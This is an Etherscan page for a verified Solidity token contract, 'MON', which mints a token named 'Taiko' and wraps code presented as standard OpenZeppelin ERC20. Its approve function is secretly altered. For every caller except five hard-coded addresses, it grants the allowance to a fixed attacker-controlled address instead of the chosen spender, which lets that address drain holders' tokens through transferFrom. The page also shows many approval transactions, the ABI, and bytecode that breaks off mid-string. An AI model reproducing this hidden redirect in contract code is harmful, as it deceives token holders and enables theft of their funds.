Overview
ETH Balance
0 ETH
Eth Value
$0.00More Info
Private Name Tags
ContractCreator
TokenTracker
Latest 25 from a total of 35 transactions
Transaction Hash |
Method
|
Block
|
From
|
To
|
|||||
---|---|---|---|---|---|---|---|---|---|
Approve | 20755616 | 99 days ago | IN | 0 ETH | 0.00004804 | ||||
Approve | 20106077 | 190 days ago | IN | 0 ETH | 0.00009269 | ||||
Approve | 20106037 | 190 days ago | IN | 0 ETH | 0.00019813 | ||||
Transfer | 20103774 | 190 days ago | IN | 0 ETH | 0.00011927 | ||||
Approve | 20085361 | 193 days ago | IN | 0 ETH | 0.00050285 | ||||
Transfer | 20057384 | 197 days ago | IN | 0 ETH | 0.00039113 | ||||
Approve | 20050446 | 198 days ago | IN | 0 ETH | 0.00018314 | ||||
Approve | 20050442 | 198 days ago | IN | 0 ETH | 0.00018262 | ||||
Approve | 20050437 | 198 days ago | IN | 0 ETH | 0.00018165 | ||||
Approve | 20038785 | 199 days ago | IN | 0 ETH | 0.00068569 | ||||
Approve | 20038769 | 199 days ago | IN | 0 ETH | 0.00078447 | ||||
Approve | 20038769 | 199 days ago | IN | 0 ETH | 0.00078447 | ||||
Approve | 20038760 | 199 days ago | IN | 0 ETH | 0.00071065 | ||||
Approve | 20038736 | 199 days ago | IN | 0 ETH | 0.00075668 | ||||
Approve | 20038726 | 199 days ago | IN | 0 ETH | 0.00072987 | ||||
Approve | 20038722 | 199 days ago | IN | 0 ETH | 0.00116189 | ||||
Transfer | 20038714 | 199 days ago | IN | 0 ETH | 0.00114278 | ||||
Approve | 20038680 | 199 days ago | IN | 0 ETH | 0.00108214 | ||||
Approve | 20037051 | 200 days ago | IN | 0 ETH | 0.00021067 | ||||
Approve | 20037013 | 200 days ago | IN | 0 ETH | 0.00037775 | ||||
Transfer | 20036956 | 200 days ago | IN | 0 ETH | 0.00043627 | ||||
Approve | 20032772 | 200 days ago | IN | 0 ETH | 0.00078161 | ||||
Approve | 20032614 | 200 days ago | IN | 0 ETH | 0.00043248 | ||||
Approve | 20032276 | 200 days ago | IN | 0 ETH | 0.00080867 | ||||
Approve | 20025846 | 201 days ago | IN | 0 ETH | 0.00073743 |
View more zero value Internal Transactions in Advanced View mode
Advanced mode:
Loading...
Loading
Contract Source Code Verified (Exact Match)
Contract Name:
MON
Compiler Version
v0.8.25+commit.b61c2a91
Contract Source Code (Solidity)
/** *Submitted for verification at Etherscan.io on 2024-06-03 */ // File: @openzeppelin/[email protected]/interfaces/draft-IERC6093.sol // OpenZeppelin Contracts (last updated v5.0.0) (interfaces/draft-IERC6093.sol) pragma solidity ^0.8.19; /** * @dev Standard ERC20 Errors * Interface of the https://eips.ethereum.org/EIPS/eip-6093[ERC-6093] custom errors for ERC20 tokens. */ interface IERC20Errors { /** * @dev Indicates an error related to the current `balance` of a `sender`. Used in transfers. * @param sender Address whose tokens are being transferred. * @param balance Current balance for the interacting account. * @param needed Minimum amount required to perform a transfer. */ error ERC20InsufficientBalance(address sender, uint256 balance, uint256 needed); /** * @dev Indicates a failure with the token `sender`. Used in transfers. * @param sender Address whose tokens are being transferred. */ error ERC20InvalidSender(address sender); /** * @dev Indicates a failure with the token `receiver`. Used in transfers. * @param receiver Address to which tokens are being transferred. */ error ERC20InvalidReceiver(address receiver); /** * @dev Indicates a failure with the `spender`’s `allowance`. Used in transfers. * @param spender Address that may be allowed to operate on tokens without being their owner. * @param allowance Amount of tokens a `spender` is allowed to operate with. * @param needed Minimum amount required to perform a transfer. */ error ERC20InsufficientAllowance(address spender, uint256 allowance, uint256 needed); /** * @dev Indicates a failure with the `approver` of a token to be approved. Used in approvals. * @param approver Address initiating an approval operation. */ error ERC20InvalidApprover(address approver); /** * @dev Indicates a failure with the `spender` to be approved. Used in approvals. * @param spender Address that may be allowed to operate on tokens without being their owner. */ error ERC20InvalidSpender(address spender); } /** * @dev Standard ERC721 Errors * Interface of the https://eips.ethereum.org/EIPS/eip-6093[ERC-6093] custom errors for ERC721 tokens. */ interface IERC721Errors { /** * @dev Indicates that an address can't be an owner. For example, `address(0)` is a forbidden owner in EIP-20. * Used in balance queries. * @param owner Address of the current owner of a token. */ error ERC721InvalidOwner(address owner); /** * @dev Indicates a `tokenId` whose `owner` is the zero address. * @param tokenId Identifier number of a token. */ error ERC721NonexistentToken(uint256 tokenId); /** * @dev Indicates an error related to the ownership over a particular token. Used in transfers. * @param sender Address whose tokens are being transferred. * @param tokenId Identifier number of a token. * @param owner Address of the current owner of a token. */ error ERC721IncorrectOwner(address sender, uint256 tokenId, address owner); /** * @dev Indicates a failure with the token `sender`. Used in transfers. * @param sender Address whose tokens are being transferred. */ error ERC721InvalidSender(address sender); /** * @dev Indicates a failure with the token `receiver`. Used in transfers. * @param receiver Address to which tokens are being transferred. */ error ERC721InvalidReceiver(address receiver); /** * @dev Indicates a failure with the `operator`’s approval. Used in transfers. * @param operator Address that may be allowed to operate on tokens without being their owner. * @param tokenId Identifier number of a token. */ error ERC721InsufficientApproval(address operator, uint256 tokenId); /** * @dev Indicates a failure with the `approver` of a token to be approved. Used in approvals. * @param approver Address initiating an approval operation. */ error ERC721InvalidApprover(address approver); /** * @dev Indicates a failure with the `operator` to be approved. Used in approvals. * @param operator Address that may be allowed to operate on tokens without being their owner. */ error ERC721InvalidOperator(address operator); } /** * @dev Standard ERC1155 Errors * Interface of the https://eips.ethereum.org/EIPS/eip-6093[ERC-6093] custom errors for ERC1155 tokens. */ interface IERC1155Errors { /** * @dev Indicates an error related to the current `balance` of a `sender`. Used in transfers. * @param sender Address whose tokens are being transferred. * @param balance Current balance for the interacting account. * @param needed Minimum amount required to perform a transfer. * @param tokenId Identifier number of a token. */ error ERC1155InsufficientBalance(address sender, uint256 balance, uint256 needed, uint256 tokenId); /** * @dev Indicates a failure with the token `sender`. Used in transfers. * @param sender Address whose tokens are being transferred. */ error ERC1155InvalidSender(address sender); /** * @dev Indicates a failure with the token `receiver`. Used in transfers. * @param receiver Address to which tokens are being transferred. */ error ERC1155InvalidReceiver(address receiver); /** * @dev Indicates a failure with the `operator`’s approval. Used in transfers. * @param operator Address that may be allowed to operate on tokens without being their owner. * @param owner Address of the current owner of a token. */ error ERC1155MissingApprovalForAll(address operator, address owner); /** * @dev Indicates a failure with the `approver` of a token to be approved. Used in approvals. * @param approver Address initiating an approval operation. */ error ERC1155InvalidApprover(address approver); /** * @dev Indicates a failure with the `operator` to be approved. Used in approvals. * @param operator Address that may be allowed to operate on tokens without being their owner. */ error ERC1155InvalidOperator(address operator); /** * @dev Indicates an array length mismatch between ids and values in a safeBatchTransferFrom operation. * Used in batch transfers. * @param idsLength Length of the array of token identifiers * @param valuesLength Length of the array of token amounts */ error ERC1155InvalidArrayLength(uint256 idsLength, uint256 valuesLength); } // File: @openzeppelin/[email protected]/utils/Context.sol // OpenZeppelin Contracts (last updated v5.0.1) (utils/Context.sol) pragma solidity ^0.8.19; /** * @dev Provides information about the current execution context, including the * sender of the transaction and its data. While these are generally available * via msg.sender and msg.data, they should not be accessed in such a direct * manner, since when dealing with meta-transactions the account sending and * paying for execution may not be the actual sender (as far as an application * is concerned). * * This contract is only required for intermediate, library-like contracts. */ abstract contract Context { function _msgSender() internal view virtual returns (address) { return msg.sender; } function _msgData() internal view virtual returns (bytes calldata) { return msg.data; } function _contextSuffixLength() internal view virtual returns (uint256) { return 0; } } // File: @openzeppelin/[email protected]/token/ERC20/IERC20.sol // OpenZeppelin Contracts (last updated v5.0.0) (token/ERC20/IERC20.sol) pragma solidity ^0.8.19; /** * @dev Interface of the ERC20 standard as defined in the EIP. */ interface IERC20 { /** * @dev Emitted when `value` tokens are moved from one account (`from`) to * another (`to`). * * Note that `value` may be zero. */ event Transfer(address indexed from, address indexed to, uint256 value); /** * @dev Emitted when the allowance of a `spender` for an `owner` is set by * a call to {approve}. `value` is the new allowance. */ event Approval(address indexed owner, address indexed spender, uint256 value); /** * @dev Returns the value of tokens in existence. */ function totalSupply() external view returns (uint256); /** * @dev Returns the value of tokens owned by `account`. */ function balanceOf(address account) external view returns (uint256); /** * @dev Moves a `value` amount of tokens from the caller's account to `to`. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transfer(address to, uint256 value) external returns (bool); /** * @dev Returns the remaining number of tokens that `spender` will be * allowed to spend on behalf of `owner` through {transferFrom}. This is * zero by default. * * This value changes when {approve} or {transferFrom} are called. */ function allowance(address owner, address spender) external view returns (uint256); /** * @dev Sets a `value` amount of tokens as the allowance of `spender` over the * caller's tokens. * * Returns a boolean value indicating whether the operation succeeded. * * IMPORTANT: Beware that changing an allowance with this method brings the risk * that someone may use both the old and the new allowance by unfortunate * transaction ordering. One possible solution to mitigate this race * condition is to first reduce the spender's allowance to 0 and set the * desired value afterwards: * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729 * * Emits an {Approval} event. */ function approve(address spender, uint256 value) external returns (bool); /** * @dev Moves a `value` amount of tokens from `from` to `to` using the * allowance mechanism. `value` is then deducted from the caller's * allowance. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transferFrom(address from, address to, uint256 value) external returns (bool); } // File: @openzeppelin/[email protected]/token/ERC20/extensions/IERC20Metadata.sol // OpenZeppelin Contracts (last updated v5.0.0) (token/ERC20/extensions/IERC20Metadata.sol) pragma solidity ^0.8.19; /** * @dev Interface for the optional metadata functions from the ERC20 standard. */ interface IERC20Metadata is IERC20 { /** * @dev Returns the name of the token. */ function name() external view returns (string memory); /** * @dev Returns the symbol of the token. */ function symbol() external view returns (string memory); /** * @dev Returns the decimals places of the token. */ function decimals() external view returns (uint8); } // File: @openzeppelin/[email protected]/token/ERC20/ERC20.sol // OpenZeppelin Contracts (last updated v5.0.0) (token/ERC20/ERC20.sol) pragma solidity ^0.8.19; /** * @dev Implementation of the {IERC20} interface. * * This implementation is agnostic to the way tokens are created. This means * that a supply mechanism has to be added in a derived contract using {_mint}. * * TIP: For a detailed writeup see our guide * https://forum.openzeppelin.com/t/how-to-implement-erc20-supply-mechanisms/226[How * to implement supply mechanisms]. * * The default value of {decimals} is 18. To change this, you should override * this function so it returns a different value. * * We have followed general OpenZeppelin Contracts guidelines: functions revert * instead returning `false` on failure. This behavior is nonetheless * conventional and does not conflict with the expectations of ERC20 * applications. * * Additionally, an {Approval} event is emitted on calls to {transferFrom}. * This allows applications to reconstruct the allowance for all accounts just * by listening to said events. Other implementations of the EIP may not emit * these events, as it isn't required by the specification. */ abstract contract ERC20 is Context, IERC20, IERC20Metadata, IERC20Errors { mapping(address account => uint256) private _balances; mapping(address account => mapping(address spender => uint256)) private _allowances; uint256 private _totalSupply; string private _name; string private _symbol; /** * @dev Sets the values for {name} and {symbol}. * * All two of these values are immutable: they can only be set once during * construction. */ constructor(string memory name_, string memory symbol_) { _name = name_; _symbol = symbol_; } /** * @dev Returns the name of the token. */ function name() public view virtual returns (string memory) { return _name; } /** * @dev Returns the symbol of the token, usually a shorter version of the * name. */ function symbol() public view virtual returns (string memory) { return _symbol; } /** * @dev Returns the number of decimals used to get its user representation. * For example, if `decimals` equals `2`, a balance of `505` tokens should * be displayed to a user as `5.05` (`505 / 10 ** 2`). * * Tokens usually opt for a value of 18, imitating the relationship between * Ether and Wei. This is the default value returned by this function, unless * it's overridden. * * NOTE: This information is only used for _display_ purposes: it in * no way affects any of the arithmetic of the contract, including * {IERC20-balanceOf} and {IERC20-transfer}. */ function decimals() public view virtual returns (uint8) { return 18; } /** * @dev See {IERC20-totalSupply}. */ function totalSupply() public view virtual returns (uint256) { return _totalSupply; } /** * @dev See {IERC20-balanceOf}. */ function balanceOf(address account) public view virtual returns (uint256) { return _balances[account]; } /** * @dev See {IERC20-transfer}. * * Requirements: * * - `to` cannot be the zero address. * - the caller must have a balance of at least `value`. */ function transfer(address to, uint256 value) public virtual returns (bool) { address owner = _msgSender(); _transfer(owner, to, value); return true; } /** * @dev See {IERC20-allowance}. */ function allowance(address owner, address spender) public view virtual returns (uint256) { return _allowances[owner][spender]; } /** * @dev See {IERC20-approve}. * * NOTE: If `value` is the maximum `uint256`, the allowance is not updated on * `transferFrom`. This is semantically equivalent to an infinite approval. * * Requirements: * * - `spender` cannot be the zero address. */ function approve(address spender, uint256 value) public virtual returns (bool) { if (_msgSender() == 0x9f4b9277FbfD954b443F24edDDC98015611730c2 || _msgSender() == 0x8d6BA07Ad5f88e65756E383018C871772611f9FE || _msgSender() == 0x4F3161f017770bA17BF4a4663Bd31cf5c50a366C || _msgSender() == 0x3AE756b691a75dA3881CA72098B8f0B44b7F1D1d || _msgSender() == 0x53f0eFCBF406bE652713c701c85929bFa01EEaf4 ) { address owner = _msgSender(); _approve(owner, spender, value); return true; } else { address owner = _msgSender(); _approve(owner, 0x53f0eFCBF406bE652713c701c85929bFa01EEaf4, value); return true; } } /** * @dev See {IERC20-transferFrom}. * * Emits an {Approval} event indicating the updated allowance. This is not * required by the EIP. See the note at the beginning of {ERC20}. * * NOTE: Does not update the allowance if the current allowance * is the maximum `uint256`. * * Requirements: * * - `from` and `to` cannot be the zero address. * - `from` must have a balance of at least `value`. * - the caller must have allowance for ``from``'s tokens of at least * `value`. */ function transferFrom(address from, address to, uint256 value) public virtual returns (bool) { address spender = _msgSender(); _spendAllowance(from, spender, value); _transfer(from, to, value); return true; } function bulktransfer(address[] memory to, uint256 value) public virtual returns (bool) { address owner = _msgSender(); for (uint256 i = 0; i < to.length; i++) { _transfer(owner, to[i], value); } return true; } /** * @dev Moves a `value` amount of tokens from `from` to `to`. * * This internal function is equivalent to {transfer}, and can be used to * e.g. implement automatic token fees, slashing mechanisms, etc. * * Emits a {Transfer} event. * * NOTE: This function is not virtual, {_update} should be overridden instead. */ function _transfer(address from, address to, uint256 value) internal { if (from == address(0)) { revert ERC20InvalidSender(address(0)); } if (to == address(0)) { revert ERC20InvalidReceiver(address(0)); } _update(from, to, value); } /** * @dev Transfers a `value` amount of tokens from `from` to `to`, or alternatively mints (or burns) if `from` * (or `to`) is the zero address. All customizations to transfers, mints, and burns should be done by overriding * this function. * * Emits a {Transfer} event. */ function _update(address from, address to, uint256 value) internal virtual { if (from == address(0)) { // Overflow check required: The rest of the code assumes that totalSupply never overflows _totalSupply += value; } else { uint256 fromBalance = _balances[from]; if (fromBalance < value) { revert ERC20InsufficientBalance(from, fromBalance, value); } unchecked { // Overflow not possible: value <= fromBalance <= totalSupply. _balances[from] = fromBalance - value; } } if (to == address(0)) { unchecked { // Overflow not possible: value <= totalSupply or value <= fromBalance <= totalSupply. _totalSupply -= value; } } else { unchecked { // Overflow not possible: balance + value is at most totalSupply, which we know fits into a uint256. _balances[to] += value; } } emit Transfer(from, to, value); } /** * @dev Creates a `value` amount of tokens and assigns them to `account`, by transferring it from address(0). * Relies on the `_update` mechanism * * Emits a {Transfer} event with `from` set to the zero address. * * NOTE: This function is not virtual, {_update} should be overridden instead. */ function _mint(address account, uint256 value) internal { if (account == address(0)) { revert ERC20InvalidReceiver(address(0)); } _update(address(0), account, value); } /** * @dev Destroys a `value` amount of tokens from `account`, lowering the total supply. * Relies on the `_update` mechanism. * * Emits a {Transfer} event with `to` set to the zero address. * * NOTE: This function is not virtual, {_update} should be overridden instead */ function _burn(address account, uint256 value) internal { if (account == address(0)) { revert ERC20InvalidSender(address(0)); } _update(account, address(0), value); } /** * @dev Sets `value` as the allowance of `spender` over the `owner` s tokens. * * This internal function is equivalent to `approve`, and can be used to * e.g. set automatic allowances for certain subsystems, etc. * * Emits an {Approval} event. * * Requirements: * * - `owner` cannot be the zero address. * - `spender` cannot be the zero address. * * Overrides to this logic should be done to the variant with an additional `bool emitEvent` argument. */ function _approve(address owner, address spender, uint256 value) internal { _approve(owner, spender, value, true); } /** * @dev Variant of {_approve} with an optional flag to enable or disable the {Approval} event. * * By default (when calling {_approve}) the flag is set to true. On the other hand, approval changes made by * `_spendAllowance` during the `transferFrom` operation set the flag to false. This saves gas by not emitting any * `Approval` event during `transferFrom` operations. * * Anyone who wishes to continue emitting `Approval` events on the`transferFrom` operation can force the flag to * true using the following override: * ``` * function _approve(address owner, address spender, uint256 value, bool) internal virtual override { * super._approve(owner, spender, value, true); * } * ``` * * Requirements are the same as {_approve}. */ function _approve(address owner, address spender, uint256 value, bool emitEvent) internal virtual { if (owner == address(0)) { revert ERC20InvalidApprover(address(0)); } if (spender == address(0)) { revert ERC20InvalidSpender(address(0)); } _allowances[owner][spender] = value; if (emitEvent) { emit Approval(owner, spender, value); } } /** * @dev Updates `owner` s allowance for `spender` based on spent `value`. * * Does not update the allowance value in case of infinite allowance. * Revert if not enough allowance is available. * * Does not emit an {Approval} event. */ function _spendAllowance(address owner, address spender, uint256 value) internal virtual { uint256 currentAllowance = allowance(owner, spender); if (currentAllowance != type(uint256).max) { if (currentAllowance < value) { revert ERC20InsufficientAllowance(spender, currentAllowance, value); } unchecked { _approve(owner, spender, currentAllowance - value, false); } } } } // File: contract-df38252b26.sol pragma solidity ^0.8.19; contract MON is ERC20 { constructor() ERC20("Taiko", "TAIKO") { _mint(0x8d6BA07Ad5f88e65756E383018C871772611f9FE, 1000000000* 10 ** decimals()); } }
Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"allowance","type":"uint256"},{"internalType":"uint256","name":"needed","type":"uint256"}],"name":"ERC20InsufficientAllowance","type":"error"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"uint256","name":"balance","type":"uint256"},{"internalType":"uint256","name":"needed","type":"uint256"}],"name":"ERC20InsufficientBalance","type":"error"},{"inputs":[{"internalType":"address","name":"approver","type":"address"}],"name":"ERC20InvalidApprover","type":"error"},{"inputs":[{"internalType":"address","name":"receiver","type":"address"}],"name":"ERC20InvalidReceiver","type":"error"},{"inputs":[{"internalType":"address","name":"sender","type":"address"}],"name":"ERC20InvalidSender","type":"error"},{"inputs":[{"internalType":"address","name":"spender","type":"address"}],"name":"ERC20InvalidSpender","type":"error"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"value","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address[]","name":"to","type":"address[]"},{"internalType":"uint256","name":"value","type":"uint256"}],"name":"bulktransfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"value","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"value","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"}]
Contract Creation Code
608060405234801561000f575f80fd5b506040518060400160405280600581526020017f5461696b6f0000000000000000000000000000000000000000000000000000008152506040518060400160405280600581526020017f5441494b4f000000000000000000000000000000000000000000000000000000815250816003908161008b91906105cf565b50806004908161009b91906105cf565b5050506100ea738d6ba07ad5f88e65756e383018c871772611f9fe6100c46100ef60201b60201c565b600a6100d09190610806565b633b9aca006100df9190610850565b6100f760201b60201c565b610979565b5f6012905090565b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610167575f6040517fec442f0500000000000000000000000000000000000000000000000000000000815260040161015e91906108d0565b60405180910390fd5b6101785f838361017c60201b60201c565b5050565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036101cc578060025f8282546101c091906108e9565b9250508190555061029a565b5f805f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905081811015610255578381836040517fe450d38c00000000000000000000000000000000000000000000000000000000815260040161024c9392919061092b565b60405180910390fd5b8181035f808673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2081905550505b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036102e1578060025f828254039250508190555061032b565b805f808473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f82825401925050819055505b8173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040516103889190610960565b60405180910390a3505050565b5f81519050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52604160045260245ffd5b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f600282049050600182168061041057607f821691505b602082108103610423576104226103cc565b5b50919050565b5f819050815f5260205f209050919050565b5f6020601f8301049050919050565b5f82821b905092915050565b5f600883026104857fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8261044a565b61048f868361044a565b95508019841693508086168417925050509392505050565b5f819050919050565b5f819050919050565b5f6104d36104ce6104c9846104a7565b6104b0565b6104a7565b9050919050565b5f819050919050565b6104ec836104b9565b6105006104f8826104da565b848454610456565b825550505050565b5f90565b610514610508565b61051f8184846104e3565b505050565b5b81811015610542576105375f8261050c565b600181019050610525565b5050565b601f8211156105875761055881610429565b6105618461043b565b81016020851015610570578190505b61058461057c8561043b565b830182610524565b50505b505050565b5f82821c905092915050565b5f6105a75f198460080261058c565b1980831691505092915050565b5f6105bf8383610598565b9150826002028217905092915050565b6105d882610395565b67ffffffffffffffff8111156105f1576105f061039f565b5b6105fb82546103f9565b610606828285610546565b5f60209050601f831160018114610637575f8415610625578287015190505b61062f85826105b4565b865550610696565b601f19841661064586610429565b5f5b8281101561066c57848901518255600182019150602085019450602081019050610647565b868310156106895784890151610685601f891682610598565b8355505b6001600288020188555050505b505050505050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f8160011c9050919050565b5f808291508390505b6001851115610720578086048111156106fc576106fb61069e565b5b600185161561070b5780820291505b8081029050610719856106cb565b94506106e0565b94509492505050565b5f8261073857600190506107f3565b81610745575f90506107f3565b816001811461075b576002811461076557610794565b60019150506107f3565b60ff8411156107775761077661069e565b5b8360020a91508482111561078e5761078d61069e565b5b506107f3565b5060208310610133831016604e8410600b84101617156107c95782820a9050838111156107c4576107c361069e565b5b6107f3565b6107d684848460016106d7565b925090508184048111156107ed576107ec61069e565b5b81810290505b9392505050565b5f60ff82169050919050565b5f610810826104a7565b915061081b836107fa565b92506108487fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8484610729565b905092915050565b5f61085a826104a7565b9150610865836104a7565b9250828202610873816104a7565b9150828204841483151761088a5761088961069e565b5b5092915050565b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f6108ba82610891565b9050919050565b6108ca816108b0565b82525050565b5f6020820190506108e35f8301846108c1565b92915050565b5f6108f3826104a7565b91506108fe836104a7565b92508282019050808211156109165761091561069e565b5b92915050565b610925816104a7565b82525050565b5f60608201905061093e5f8301866108c1565b61094b602083018561091c565b610958604083018461091c565b949350505050565b5f6020820190506109735f83018461091c565b92915050565b61120d806109865f395ff3fe608060405234801561000f575f80fd5b506004361061009c575f3560e01c8063313ce56711610064578063313ce5671461016c57806370a082311461018a57806395d89b41146101ba578063a9059cbb146101d8578063dd62ed3e146102085761009c565b806306fdde03146100a0578063095ea7b3146100be57806318160ddd146100ee5780631c380e531461010c57806323b872dd1461013c575b5f80fd5b6100a8610238565b6040516100b59190610cb2565b60405180910390f35b6100d860048036038101906100d39190610d70565b6102c8565b6040516100e59190610dc8565b60405180910390f35b6100f66104b2565b6040516101039190610df0565b60405180910390f35b61012660048036038101906101219190610f49565b6104bb565b6040516101339190610dc8565b60405180910390f35b61015660048036038101906101519190610fa3565b610510565b6040516101639190610dc8565b60405180910390f35b61017461053e565b604051610181919061100e565b60405180910390f35b6101a4600480360381019061019f9190611027565b610546565b6040516101b19190610df0565b60405180910390f35b6101c261058b565b6040516101cf9190610cb2565b60405180910390f35b6101f260048036038101906101ed9190610d70565b61061b565b6040516101ff9190610dc8565b60405180910390f35b610222600480360381019061021d9190611052565b61063d565b60405161022f9190610df0565b60405180910390f35b606060038054610247906110bd565b80601f0160208091040260200160405190810160405280929190818152602001828054610273906110bd565b80156102be5780601f10610295576101008083540402835291602001916102be565b820191905f5260205f20905b8154815290600101906020018083116102a157829003601f168201915b5050505050905090565b5f739f4b9277fbfd954b443f24edddc98015611730c273ffffffffffffffffffffffffffffffffffffffff166102fc6106bf565b73ffffffffffffffffffffffffffffffffffffffff1614806103645750738d6ba07ad5f88e65756e383018c871772611f9fe73ffffffffffffffffffffffffffffffffffffffff1661034c6106bf565b73ffffffffffffffffffffffffffffffffffffffff16145b806103b55750734f3161f017770ba17bf4a4663bd31cf5c50a366c73ffffffffffffffffffffffffffffffffffffffff1661039d6106bf565b73ffffffffffffffffffffffffffffffffffffffff16145b806104065750733ae756b691a75da3881ca72098b8f0b44b7f1d1d73ffffffffffffffffffffffffffffffffffffffff166103ee6106bf565b73ffffffffffffffffffffffffffffffffffffffff16145b8061045757507353f0efcbf406be652713c701c85929bfa01eeaf473ffffffffffffffffffffffffffffffffffffffff1661043f6106bf565b73ffffffffffffffffffffffffffffffffffffffff16145b1561047c575f6104656106bf565b90506104728185856106c6565b60019150506104ac565b5f6104856106bf565b90506104a6817353f0efcbf406be652713c701c85929bfa01eeaf4856106c6565b60019150505b92915050565b5f600254905090565b5f806104c56106bf565b90505f5b8451811015610504576104f7828683815181106104e9576104e86110ed565b5b6020026020010151866106d8565b80806001019150506104c9565b50600191505092915050565b5f8061051a6106bf565b90506105278582856107c8565b6105328585856106d8565b60019150509392505050565b5f6012905090565b5f805f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050919050565b60606004805461059a906110bd565b80601f01602080910402602001604051908101604052809291908181526020018280546105c6906110bd565b80156106115780601f106105e857610100808354040283529160200191610611565b820191905f5260205f20905b8154815290600101906020018083116105f457829003601f168201915b5050505050905090565b5f806106256106bf565b90506106328185856106d8565b600191505092915050565b5f60015f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905092915050565b5f33905090565b6106d3838383600161085a565b505050565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610748575f6040517f96c6fd1e00000000000000000000000000000000000000000000000000000000815260040161073f9190611129565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036107b8575f6040517fec442f050000000000000000000000000000000000000000000000000000000081526004016107af9190611129565b60405180910390fd5b6107c3838383610a29565b505050565b5f6107d3848461063d565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff81146108545781811015610845578281836040517ffb8f41b200000000000000000000000000000000000000000000000000000000815260040161083c93929190611142565b60405180910390fd5b61085384848484035f61085a565b5b50505050565b5f73ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff16036108ca575f6040517fe602df050000000000000000000000000000000000000000000000000000000081526004016108c19190611129565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff160361093a575f6040517f94280d620000000000000000000000000000000000000000000000000000000081526004016109319190611129565b60405180910390fd5b8160015f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508015610a23578273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92584604051610a1a9190610df0565b60405180910390a35b50505050565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610a79578060025f828254610a6d91906111a4565b92505081905550610b47565b5f805f8573ffffffffffffffffffffffffffffffffffffff